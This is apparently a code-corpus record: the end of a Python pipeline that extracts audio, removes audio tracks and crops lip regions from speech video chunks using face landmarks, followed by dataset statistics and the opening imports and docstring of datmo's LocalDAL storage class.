module_video_processing.extract_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_WORD_CHUNK_SAMPLES_ACPWE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_AUDIO_WORD_CHOPPED_ACPWE_NAMES, BIT_RATE = '192000')
module_video_processing.extract_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_WORD_CHUNK_SAMPLES_MCPWE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_AUDIO_WORD_CHOPPED_MCPWE_NAMES, BIT_RATE = '192000')
# Multiple files, per sentence:
module_video_processing.extract_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSH_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_AUDIO_SENTENCE_MCPSH_CHOPPED_NAMES, BIT_RATE = '192000')
module_video_processing.extract_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_AUDIO_SENTENCE_MCPSE_CHOPPED_NAMES, BIT_RATE = '192000')
module_video_processing.extract_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSH_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_AUDIO_SENTENCE_ACPSH_CHOPPED_NAMES, BIT_RATE = '192000')
module_video_processing.extract_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_AUDIO_SENTENCE_ACPSE_CHOPPED_NAMES, BIT_RATE = '192000')
#18
# Copy the chopped samples without their audio track into the pure_video folders.
# Single-file variant, kept for reference:
#module_video_processing.remove_audio_from_mkv_file(INPUT_FILE_NAME, OUTPUT_FILE_NAME)
# Multiple files, per word:
#module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = list_input_word_chunk_samples_file_names, OUTPUT_FILE_NAME = list_output_video_word_chopped_names)
module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_WORD_CHUNK_SAMPLES_ACPWE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_WORD_CHOPPED_ACPWE_NAMES)
module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_WORD_CHUNK_SAMPLES_MCPWE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_WORD_CHOPPED_MCPWE_NAMES)
# Multiple files, per sentence:
#module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = list_input_sentence_chunk_samples_file_names, OUTPUT_FILE_NAME = list_output_video_sentence_chopped_names)
module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSH_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_MCPSH_CHOPPED_NAMES)
module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_MCPSE_CHOPPED_NAMES)
module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSH_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_ACPSH_CHOPPED_NAMES)
module_video_processing.remove_audio_from_list_mkv_files(INPUT_FILE_NAME = LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSE_FILE_NAMES, OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_ACPSE_CHOPPED_NAMES)
#19
# Apply face recognition and lip-region cropping to every pure-video chunk
# family.  FOURCC M J P G selects MJPEG compression (FOURCC1='M', FOURCC2='J',
# FOURCC3='P', FOURCC4='G'); an uncompressed/lossless alternative is RGBA
# (FOURCC1='R', FOURCC2='G', FOURCC3='B', FOURCC4='A'), which creates massive files.
# FLIP_ARGUMENT semantics (OpenCV flip codes):
#   0  -> flip around the x-axis (vertical flip)
#   >0 -> flip around the y-axis (horizontal flip)
#   <0 -> flip around both axes
# Here FLIP = True with FLIP_ARGUMENT = 1 (horizontal flip).
# NOTE(review): all six calls below use identical settings (MJPEG .avi output,
# 110x105 crop shifted 50 px left, lip landmarks 48-68); each call reads and
# writes the same file list, appending '_cropped' to the outputs.
#acpwe
pure_video_cropped_word_chunk_samples_info_acpwe = module_face_detection.multiple_file_camera_face_rec_and_cropping(LIST_OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_WORD_CHOPPED_ACPWE_NAMES, LIST_OF_INPUT_FILE_NAME = LIST_OUTPUT_VIDEO_WORD_CHOPPED_ACPWE_NAMES, FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G', ADD_STR_CROPPED_FILE_NAME = '_cropped', INPUT_FILE_NAME_EXTENSION = '.mkv', OUPUT_FILE_NAME_EXTENSION = '.avi', CROPPED_WIDTH = 110, CROPPED_HEIGHT = 105, SHIFT_RIGHT = -50, SHIFT_DOWN = 0, OUTPUT_FPS = 'same', ENABLE_FACE_RECOGNITION_TRACKING_CROPING = True, WHOLE_FACE_PROFILE = False, LIPS_PROFILE = False, LOAD_FACE_LANDMARKS = True, POINT_LAND_MARK_TRACKING = False, LAND_MARK_TRACKING_NUMBER = 1, LAND_MARK_LIP_TRACKING = True, CAPTURE_FACE_LANDMARKS = True, DISPLAY_FACE_LANDMARKS = False, SAVE_LANDMARK_TRACKING_RESULTS = False, SAVE_LANDMARK_TRACKING_RESULTS_NAME = 'Record', SAVE_WHOLE = False, SAVE_CROPPED = True, DISPLAY_WHOLE = False, DISPLAY_CROPPED = False, FUTURE_KILL_SWITCH = False, ENABLE_CUBIC_LAND_MARK_TRACKING = False, CUBIC_LAND_MARK_POINT_TOP = 34,CUBIC_LAND_MARK_POINT_LEFT = 49, CUBIC_LAND_MARK_POINT_BOTTOM = 9, CUBIC_LAND_MARK_POINT_RIGHT = 55, FLIP = True, FLIP_ARGUMENT = 1, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_START = 48, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_STOP = 68)
#mcpwe
pure_video_cropped_word_chunk_samples_info_mcpwe = module_face_detection.multiple_file_camera_face_rec_and_cropping(LIST_OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_WORD_CHOPPED_MCPWE_NAMES, LIST_OF_INPUT_FILE_NAME = LIST_OUTPUT_VIDEO_WORD_CHOPPED_MCPWE_NAMES, FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G', ADD_STR_CROPPED_FILE_NAME = '_cropped', INPUT_FILE_NAME_EXTENSION = '.mkv', OUPUT_FILE_NAME_EXTENSION = '.avi', CROPPED_WIDTH = 110, CROPPED_HEIGHT = 105, SHIFT_RIGHT = -50, SHIFT_DOWN = 0, OUTPUT_FPS = 'same', ENABLE_FACE_RECOGNITION_TRACKING_CROPING = True, WHOLE_FACE_PROFILE = False, LIPS_PROFILE = False, LOAD_FACE_LANDMARKS = True, POINT_LAND_MARK_TRACKING = False, LAND_MARK_TRACKING_NUMBER = 1, LAND_MARK_LIP_TRACKING = True, CAPTURE_FACE_LANDMARKS = True, DISPLAY_FACE_LANDMARKS = False, SAVE_LANDMARK_TRACKING_RESULTS = False, SAVE_LANDMARK_TRACKING_RESULTS_NAME = 'Record', SAVE_WHOLE = False, SAVE_CROPPED = True, DISPLAY_WHOLE = False, DISPLAY_CROPPED = False, FUTURE_KILL_SWITCH = False, ENABLE_CUBIC_LAND_MARK_TRACKING = False, CUBIC_LAND_MARK_POINT_TOP = 34,CUBIC_LAND_MARK_POINT_LEFT = 49, CUBIC_LAND_MARK_POINT_BOTTOM = 9, CUBIC_LAND_MARK_POINT_RIGHT = 55, FLIP = True, FLIP_ARGUMENT = 1, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_START = 48, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_STOP = 68)
# mcpsh
pure_video_cropped_sentence_chunk_samples_info_mcpsh = module_face_detection.multiple_file_camera_face_rec_and_cropping(LIST_OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_MCPSH_CHOPPED_NAMES, LIST_OF_INPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_MCPSH_CHOPPED_NAMES, FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G', ADD_STR_CROPPED_FILE_NAME = '_cropped', INPUT_FILE_NAME_EXTENSION = '.mkv', OUPUT_FILE_NAME_EXTENSION = '.avi', CROPPED_WIDTH = 110, CROPPED_HEIGHT = 105, SHIFT_RIGHT = -50, SHIFT_DOWN = 0, OUTPUT_FPS = 'same', ENABLE_FACE_RECOGNITION_TRACKING_CROPING = True, WHOLE_FACE_PROFILE = False, LIPS_PROFILE = False, LOAD_FACE_LANDMARKS = True, POINT_LAND_MARK_TRACKING = False, LAND_MARK_TRACKING_NUMBER = 1, LAND_MARK_LIP_TRACKING = True, CAPTURE_FACE_LANDMARKS = True, DISPLAY_FACE_LANDMARKS = False, SAVE_LANDMARK_TRACKING_RESULTS = False, SAVE_LANDMARK_TRACKING_RESULTS_NAME = 'Record', SAVE_WHOLE = False, SAVE_CROPPED = True, DISPLAY_WHOLE = False, DISPLAY_CROPPED = False, FUTURE_KILL_SWITCH = False, ENABLE_CUBIC_LAND_MARK_TRACKING = False, CUBIC_LAND_MARK_POINT_TOP = 34,CUBIC_LAND_MARK_POINT_LEFT = 49, CUBIC_LAND_MARK_POINT_BOTTOM = 9, CUBIC_LAND_MARK_POINT_RIGHT = 55, FLIP = True, FLIP_ARGUMENT = 1, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_START = 48, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_STOP = 68)
#acpse
pure_video_cropped_sentence_chunk_samples_info_acpse = module_face_detection.multiple_file_camera_face_rec_and_cropping(LIST_OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_ACPSE_CHOPPED_NAMES, LIST_OF_INPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_ACPSE_CHOPPED_NAMES, FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G', ADD_STR_CROPPED_FILE_NAME = '_cropped', INPUT_FILE_NAME_EXTENSION = '.mkv', OUPUT_FILE_NAME_EXTENSION = '.avi', CROPPED_WIDTH = 110, CROPPED_HEIGHT = 105, SHIFT_RIGHT = -50, SHIFT_DOWN = 0, OUTPUT_FPS = 'same', ENABLE_FACE_RECOGNITION_TRACKING_CROPING = True, WHOLE_FACE_PROFILE = False, LIPS_PROFILE = False, LOAD_FACE_LANDMARKS = True, POINT_LAND_MARK_TRACKING = False, LAND_MARK_TRACKING_NUMBER = 1, LAND_MARK_LIP_TRACKING = True, CAPTURE_FACE_LANDMARKS = True, DISPLAY_FACE_LANDMARKS = False, SAVE_LANDMARK_TRACKING_RESULTS = False, SAVE_LANDMARK_TRACKING_RESULTS_NAME = 'Record', SAVE_WHOLE = False, SAVE_CROPPED = True, DISPLAY_WHOLE = False, DISPLAY_CROPPED = False, FUTURE_KILL_SWITCH = False, ENABLE_CUBIC_LAND_MARK_TRACKING = False, CUBIC_LAND_MARK_POINT_TOP = 34,CUBIC_LAND_MARK_POINT_LEFT = 49, CUBIC_LAND_MARK_POINT_BOTTOM = 9, CUBIC_LAND_MARK_POINT_RIGHT = 55, FLIP = True, FLIP_ARGUMENT = 1, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_START = 48, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_STOP = 68)
#acpsh
pure_video_cropped_sentence_chunk_samples_info_acpsh = module_face_detection.multiple_file_camera_face_rec_and_cropping(LIST_OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_ACPSH_CHOPPED_NAMES, LIST_OF_INPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_ACPSH_CHOPPED_NAMES, FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G', ADD_STR_CROPPED_FILE_NAME = '_cropped', INPUT_FILE_NAME_EXTENSION = '.mkv', OUPUT_FILE_NAME_EXTENSION = '.avi', CROPPED_WIDTH = 110, CROPPED_HEIGHT = 105, SHIFT_RIGHT = -50, SHIFT_DOWN = 0, OUTPUT_FPS = 'same', ENABLE_FACE_RECOGNITION_TRACKING_CROPING = True, WHOLE_FACE_PROFILE = False, LIPS_PROFILE = False, LOAD_FACE_LANDMARKS = True, POINT_LAND_MARK_TRACKING = False, LAND_MARK_TRACKING_NUMBER = 1, LAND_MARK_LIP_TRACKING = True, CAPTURE_FACE_LANDMARKS = True, DISPLAY_FACE_LANDMARKS = False, SAVE_LANDMARK_TRACKING_RESULTS = False, SAVE_LANDMARK_TRACKING_RESULTS_NAME = 'Record', SAVE_WHOLE = False, SAVE_CROPPED = True, DISPLAY_WHOLE = False, DISPLAY_CROPPED = False, FUTURE_KILL_SWITCH = False, ENABLE_CUBIC_LAND_MARK_TRACKING = False, CUBIC_LAND_MARK_POINT_TOP = 34,CUBIC_LAND_MARK_POINT_LEFT = 49, CUBIC_LAND_MARK_POINT_BOTTOM = 9, CUBIC_LAND_MARK_POINT_RIGHT = 55, FLIP = True, FLIP_ARGUMENT = 1, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_START = 48, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_STOP = 68)
# mcpse
pure_video_cropped_sentence_chunk_samples_info_mcpse = module_face_detection.multiple_file_camera_face_rec_and_cropping(LIST_OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_MCPSE_CHOPPED_NAMES, LIST_OF_INPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_MCPSE_CHOPPED_NAMES, FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G', ADD_STR_CROPPED_FILE_NAME = '_cropped', INPUT_FILE_NAME_EXTENSION = '.mkv', OUPUT_FILE_NAME_EXTENSION = '.avi', CROPPED_WIDTH = 110, CROPPED_HEIGHT = 105, SHIFT_RIGHT = -50, SHIFT_DOWN = 0, OUTPUT_FPS = 'same', ENABLE_FACE_RECOGNITION_TRACKING_CROPING = True, WHOLE_FACE_PROFILE = False, LIPS_PROFILE = False, LOAD_FACE_LANDMARKS = True, POINT_LAND_MARK_TRACKING = False, LAND_MARK_TRACKING_NUMBER = 1, LAND_MARK_LIP_TRACKING = True, CAPTURE_FACE_LANDMARKS = True, DISPLAY_FACE_LANDMARKS = False, SAVE_LANDMARK_TRACKING_RESULTS = False, SAVE_LANDMARK_TRACKING_RESULTS_NAME = 'Record', SAVE_WHOLE = False, SAVE_CROPPED = True, DISPLAY_WHOLE = False, DISPLAY_CROPPED = False, FUTURE_KILL_SWITCH = False, ENABLE_CUBIC_LAND_MARK_TRACKING = False, CUBIC_LAND_MARK_POINT_TOP = 34,CUBIC_LAND_MARK_POINT_LEFT = 49, CUBIC_LAND_MARK_POINT_BOTTOM = 9, CUBIC_LAND_MARK_POINT_RIGHT = 55, FLIP = True, FLIP_ARGUMENT = 1, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_START = 48, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_STOP = 68)
# Example of how to load a json file (was a no-op triple-quoted string;
# converted to real comments so it cannot be mistaken for a docstring):
#   import json
#   filename = '/absolute directory.json'
#   with open(filename, 'r') as f:
#       atpse = json.load(f)
# Pull the lists of cropped-video file names out of each chunk-family info
# dict returned by the face-recognition/cropping step above.
pure_video_cropped_word_chunk_samples_file_dir_acpwe = pure_video_cropped_word_chunk_samples_info_acpwe['LIST_CROPPED_VIDEO_FILENAME']
pure_video_cropped_word_chunk_samples_file_dir_mcpwe = pure_video_cropped_word_chunk_samples_info_mcpwe['LIST_CROPPED_VIDEO_FILENAME']
pure_video_cropped_sentence_chunk_samples_file_dir_acpse = pure_video_cropped_sentence_chunk_samples_info_acpse['LIST_CROPPED_VIDEO_FILENAME']
pure_video_cropped_sentence_chunk_samples_file_dir_acpsh = pure_video_cropped_sentence_chunk_samples_info_acpsh['LIST_CROPPED_VIDEO_FILENAME']
pure_video_cropped_sentence_chunk_samples_file_dir_mcpse = pure_video_cropped_sentence_chunk_samples_info_mcpse['LIST_CROPPED_VIDEO_FILENAME']
pure_video_cropped_sentence_chunk_samples_file_dir_mcpsh = pure_video_cropped_sentence_chunk_samples_info_mcpsh['LIST_CROPPED_VIDEO_FILENAME']
# Bookkeeping: group every produced file-name list into named dictionaries so
# they can be saved/inspected together.
whole_files_name_dir = {'video_converted_to_mkv' : video_converted_to_mkv, 'video_converted_to_mkv_none_audio' : video_converted_to_mkv_none_audio, 'whole_pure_audio_file_name_dir' : whole_pure_audio_file_name_dir}
chopped_files_name_dir = {'LLIST_INPUT_WORD_CHUNK_SAMPLES_ACPWE_FILE_NAMES' : LLIST_INPUT_WORD_CHUNK_SAMPLES_ACPWE_FILE_NAMES
, 'LLIST_INPUT_WORD_CHUNK_SAMPLES_MCPWE_FILE_NAMES' : LLIST_INPUT_WORD_CHUNK_SAMPLES_MCPWE_FILE_NAMES, 'LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSH_FILE_NAMES' : LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSH_FILE_NAMES, 'LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSE_FILE_NAMES' : LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSE_FILE_NAMES, 'LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSH_FILE_NAMES' : LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSH_FILE_NAMES, 'LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSE_FILE_NAMES' : LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSE_FILE_NAMES}
chopped_pure_audio_files_name_dir = {'LIST_OUTPUT_AUDIO_WORD_CHOPPED_ACPWE_NAMES' : LIST_OUTPUT_AUDIO_WORD_CHOPPED_ACPWE_NAMES, 'LIST_OUTPUT_AUDIO_WORD_CHOPPED_MCPWE_NAMES' : LIST_OUTPUT_AUDIO_WORD_CHOPPED_MCPWE_NAMES, 'LIST_OUTPUT_AUDIO_SENTENCE_MCPSH_CHOPPED_NAMES' : LIST_OUTPUT_AUDIO_SENTENCE_MCPSH_CHOPPED_NAMES, 'LIST_OUTPUT_AUDIO_SENTENCE_MCPSE_CHOPPED_NAMES' : LIST_OUTPUT_AUDIO_SENTENCE_MCPSE_CHOPPED_NAMES, 'LIST_OUTPUT_AUDIO_SENTENCE_ACPSH_CHOPPED_NAMES' : LIST_OUTPUT_AUDIO_SENTENCE_ACPSH_CHOPPED_NAMES, 'LIST_OUTPUT_AUDIO_SENTENCE_ACPSE_CHOPPED_NAMES' : LIST_OUTPUT_AUDIO_SENTENCE_ACPSE_CHOPPED_NAMES}
chopped_pure_video_files_name_dir = {'LIST_OUTPUT_VIDEO_WORD_CHOPPED_ACPWE_NAMES' : LIST_OUTPUT_VIDEO_WORD_CHOPPED_ACPWE_NAMES
, 'LIST_OUTPUT_VIDEO_WORD_CHOPPED_MCPWE_NAMES' : LIST_OUTPUT_VIDEO_WORD_CHOPPED_MCPWE_NAMES, 'LIST_OUTPUT_VIDEO_SENTENCE_MCPSH_CHOPPED_NAMES' : LIST_OUTPUT_VIDEO_SENTENCE_MCPSH_CHOPPED_NAMES, 'LIST_OUTPUT_VIDEO_SENTENCE_MCPSE_CHOPPED_NAMES' : LIST_OUTPUT_VIDEO_SENTENCE_MCPSE_CHOPPED_NAMES, 'LIST_OUTPUT_VIDEO_SENTENCE_ACPSH_CHOPPED_NAMES' : LIST_OUTPUT_VIDEO_SENTENCE_ACPSH_CHOPPED_NAMES, 'LIST_OUTPUT_VIDEO_SENTENCE_ACPSE_CHOPPED_NAMES' : LIST_OUTPUT_VIDEO_SENTENCE_ACPSE_CHOPPED_NAMES}
chopped_cropped_pure_video_files_name_dir = {'pure_video_cropped_word_chunk_samples_file_dir_acpwe' : pure_video_cropped_word_chunk_samples_file_dir_acpwe
, 'pure_video_cropped_word_chunk_samples_file_dir_mcpwe' : pure_video_cropped_word_chunk_samples_file_dir_mcpwe, 'pure_video_cropped_sentence_chunk_samples_file_dir_mcpsh' : pure_video_cropped_sentence_chunk_samples_file_dir_mcpsh, 'pure_video_cropped_sentence_chunk_samples_file_dir_mcpse' : pure_video_cropped_sentence_chunk_samples_file_dir_mcpse, 'pure_video_cropped_sentence_chunk_samples_file_dir_acpsh' : pure_video_cropped_sentence_chunk_samples_file_dir_acpsh, 'pure_video_cropped_sentence_chunk_samples_file_dir_acpse' : pure_video_cropped_sentence_chunk_samples_file_dir_acpse}
dir_name_dictionary = {'whole_files_name_dir' : whole_files_name_dir, 'chopped_files_name_dir' : chopped_files_name_dir, 'chopped_pure_audio_files_name_dir' : chopped_pure_audio_files_name_dir, 'chopped_pure_video_files_name_dir' : chopped_pure_video_files_name_dir, 'chopped_cropped_pure_video_files_name_dir' : chopped_cropped_pure_video_files_name_dir}
# NOTE(review): the sub-dicts have different key sets, so this DataFrame will
# contain NaN cells — presumably only used as a human-readable overview; confirm.
variable_names_dataframe = pd.DataFrame(dir_name_dictionary)
# To add a key only when it is missing, e.g.:
# if 'c' not in d.keys():
#     d['c'] = 300
# list of input video file-name lists
list_chopped_cropped_pure_video_files_name =list(chopped_cropped_pure_video_files_name_dir.values())
# list of input audio file-name lists
list_chopped_pure_audio_files_name = list(chopped_pure_audio_files_name_dir.values())
#13
# Use the fps of each chunk to derive the time between frames, so the landmark
# x/y coordinates can later be mapped onto a time axis.
cropped_chunk_info_list = [pure_video_cropped_word_chunk_samples_info_acpwe, pure_video_cropped_word_chunk_samples_info_mcpwe, pure_video_cropped_sentence_chunk_samples_info_acpse, pure_video_cropped_sentence_chunk_samples_info_acpsh, pure_video_cropped_sentence_chunk_samples_info_mcpse, pure_video_cropped_sentence_chunk_samples_info_mcpsh]
# Add the time between frames (seconds) to every chunk-info dict, in place.
# `i` and `k` are kept as loop variables because they are deleted at the end
# of the script.
for i, OUR_SAMPLE in enumerate(cropped_chunk_info_list):
    FPS_LIST = OUR_SAMPLE.get('LIST_OF_INPUT_VIDEO_FPS')
    TIME_BETWEEN_FRAMES = []
    for k, FPS_PER_SAMPLE in enumerate(FPS_LIST):
        if FPS_PER_SAMPLE == 0:
            # Guard against division by zero (e.g. unreadable video).
            TIME_BETWEEN_FRAMES_PER_SAMPLE = 0
        else:
            # 1.0 / fps forces true division; the previous float(1/fps) would
            # truncate to 0.0 when fps is an int under integer division.
            TIME_BETWEEN_FRAMES_PER_SAMPLE = 1.0 / FPS_PER_SAMPLE
        TIME_BETWEEN_FRAMES.append(TIME_BETWEEN_FRAMES_PER_SAMPLE)
    OUR_SAMPLE['TIME_BETWEEN_FRAMES_IN_SECONDS'] = TIME_BETWEEN_FRAMES
# Label each chunk-info dict with its family key (word/sentence, auto/manual).
cropped_chunk_info_dict = {'acpwe' : cropped_chunk_info_list[0], 'mcpwe': cropped_chunk_info_list[1], 'acpse':cropped_chunk_info_list[2], 'acpsh':cropped_chunk_info_list[3], 'mcpse':cropped_chunk_info_list[4], 'mcpsh':cropped_chunk_info_list[5]}
# The previous code rebuilt cropped_chunk_info_list from dict.values(); that is
# a no-op on Python >= 3.7 (insertion-ordered dicts) but could silently reorder
# the list on older interpreters and mislabel every chunk downstream, so the
# already correctly ordered list is kept as-is.
# Key used to look up per-frame timing.  For downloaded videos:
FPS = 'TIME_BETWEEN_FRAMES_IN_SECONDS'
# For recorded videos use instead:
#FPS = 'LIST_OF_MEASURED_FPS'
# For every chunk, attach a time axis to its landmark data: frame z occurs at
# z * time_between_frames seconds.  Mutates the landmark dicts in place.
# Loop variables `i`, `k`, `z` and the names LANDMARK_DATAFRAME_array /
# LENGTH_OF_LANDMARK_DATAFRAME_array are preserved because they are deleted at
# the end of the script.
for i, cropped_chunk_info_list_value in enumerate(cropped_chunk_info_list):
    GET_LIST_OF_TIME_BETWEEN_FRAMES_IN_SECONDS = cropped_chunk_info_list_value.get(FPS)
    GET_LIST_OF_LAND_MARK_RESULTS = cropped_chunk_info_list_value.get('LIST_OF_LAND_MARK_RESULTS')
    for k, LANDMARK_DATAFRAME_VALUE in enumerate(GET_LIST_OF_LAND_MARK_RESULTS):
        TIME_BETWEEN_FRAMES_IN_SECONDS_VALUE = GET_LIST_OF_TIME_BETWEEN_FRAMES_IN_SECONDS[k]
        LANDMARK_DATAFRAME_array = LANDMARK_DATAFRAME_VALUE.get('X-Y Land Mark Coordinates')
        LENGTH_OF_LANDMARK_DATAFRAME_array = len(LANDMARK_DATAFRAME_array)
        # Pre-size the time array (filled by index below).
        LAND_MARK_TIME_LENGTH_ARRAY = [None]*LENGTH_OF_LANDMARK_DATAFRAME_array
        TIME_VALUE_IN_SECONDS = 0
        for z in range(LENGTH_OF_LANDMARK_DATAFRAME_array):
            LAND_MARK_TIME_LENGTH_ARRAY[z] = float(TIME_VALUE_IN_SECONDS)
            TIME_VALUE_IN_SECONDS = TIME_VALUE_IN_SECONDS + TIME_BETWEEN_FRAMES_IN_SECONDS_VALUE
        # Attach the time axis to the landmark record.
        LANDMARK_DATAFRAME_VALUE['LAND_MARK_TIME_LENGTH_ARRAY'] = LAND_MARK_TIME_LENGTH_ARRAY
#pure_video_cropped_word_chunk_samples_info_acpwe.get('LIST_OF_INPUT_VIDEO_FPS')
#cropped_chunk_info_list_value['Start Times'] =
# Rebuild the labeled dict from the (in-place mutated) list so the saved copy
# includes the time information added above.
cropped_chunk_info_dict = {'acpwe' : cropped_chunk_info_list[0], 'mcpwe': cropped_chunk_info_list[1], 'acpse':cropped_chunk_info_list[2], 'acpsh':cropped_chunk_info_list[3], 'mcpse':cropped_chunk_info_list[4], 'mcpsh':cropped_chunk_info_list[5]}
# Save results.
# Note: some information is lost in the saved file, since we are saving a dict
# that itself contains multiple other lists and dataframes.
module_save_variables.save_pandas_dict_results(VAR_INPUT = cropped_chunk_info_dict, FILE_NAME = FOLDER_PATH + '/cropped_chunks_info_dict', CSV=True, TXT=True)
# TODO: the user may decide to chop the whole video and delete all samples that
# fall below the stated threshold of LIST_RATIO_OF_DETECTED_FACES_PER_FRAME.
#12 TODO: add functionality that automatically deletes any video in which a face
# is detected in fewer than 90% of the frames.
# delet unecessary variables
del extend_left_acpse
del extend_left_acpsh
del extend_left_acpwe
del extend_left_mcpse
del extend_left_mcpsh
del extend_left_mcpwe
del extend_right_acpse
del extend_right_acpsh
del extend_right_acpwe
del extend_right_mcpse
del extend_right_mcpsh
del extend_right_mcpwe
del i
del k
del z
del shift_right_or_left_acpse
del shift_right_or_left_acpsh
del shift_right_or_left_acpwe
del shift_right_or_left_mcpse
del shift_right_or_left_mcpsh
del shift_right_or_left_mcpwe
del start_index_acpse
del start_index_acpsh
del start_index_acpwe
del start_index_mcpse
del start_index_mcpsh
del start_index_mcpwe
del stop_index_acpse
del stop_index_acpsh
del stop_index_acpwe
del stop_index_mcpse
del stop_index_mcpsh
del stop_index_mcpwe
del LANDMARK_DATAFRAME_array
del LENGTH_OF_LANDMARK_DATAFRAME_array
### END ###
| 70.80799 | 1,331 | 0.834804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18,804 | 0.342221 |
63561f96997f9bab466f2fe72890e847cd62196a | 9,462 | py | Python | datmo/core/storage/local/dal.py | awesome-archive/datmo | 72ea51c28a9947e24a464395bb0136b39eb6001a | [
"Apache-2.0"
] | 331 | 2018-03-30T14:33:59.000Z | 2022-01-10T19:43:32.000Z | datmo/core/storage/local/dal.py | KIMS-Github/datmo | a456d196006b67ce56af96cb4900682eab747bef | [
"MIT"
] | 274 | 2018-04-08T17:12:44.000Z | 2020-07-29T02:45:22.000Z | datmo/core/storage/local/dal.py | KIMS-Github/datmo | a456d196006b67ce56af96cb4900682eab747bef | [
"MIT"
] | 28 | 2018-05-03T21:57:22.000Z | 2020-12-31T04:18:42.000Z | import os
from kids.cache import cache
from datetime import datetime
from datmo.core.util.i18n import get as __
from datmo.core.entity.model import Model
from datmo.core.entity.code import Code
from datmo.core.entity.environment import Environment
from datmo.core.entity.file_collection import FileCollection
from datmo.core.entity.task import Task
from datmo.core.entity.snapshot import Snapshot
from datmo.core.entity.user import User
from datmo.core.util.exceptions import InputError, EntityNotFound, MoreThanOneEntityFound, DALNotInitialized
from datmo.core.util.misc_functions import create_unique_hash
from datmo.core.storage.driver.blitzdb_dal_driver import BlitzDBDALDriver
class LocalDAL():
"""
LocalDAL is a local DAL object that stores info locally. DAL stands for 'data access layer' and serves as a storage for
all entities.
Parameters
----------
driver_type : str
type of driver to pull from
driver_options : dict
options for the DALdriver class
driver : datmo.core.storage.driver.DALDriver, optional
Instantiated DAL driver used for backend storage for entities
Attributes
----------
driver_type : str
driver_options : dict
driver : datmo.core.storage.driver.DALDriver
Instantiated DAL driver used for backend storage for entities
is_initialized : bool
model : ModelMethods
code : CodeMethods
environment : EnvironmentMethods
file_collection : FileCollectionMethods
task : TaskMethods
snapshot : SnapshotMethods
user : UserMethods
Methods
-------
init()
initialize the dal
"""
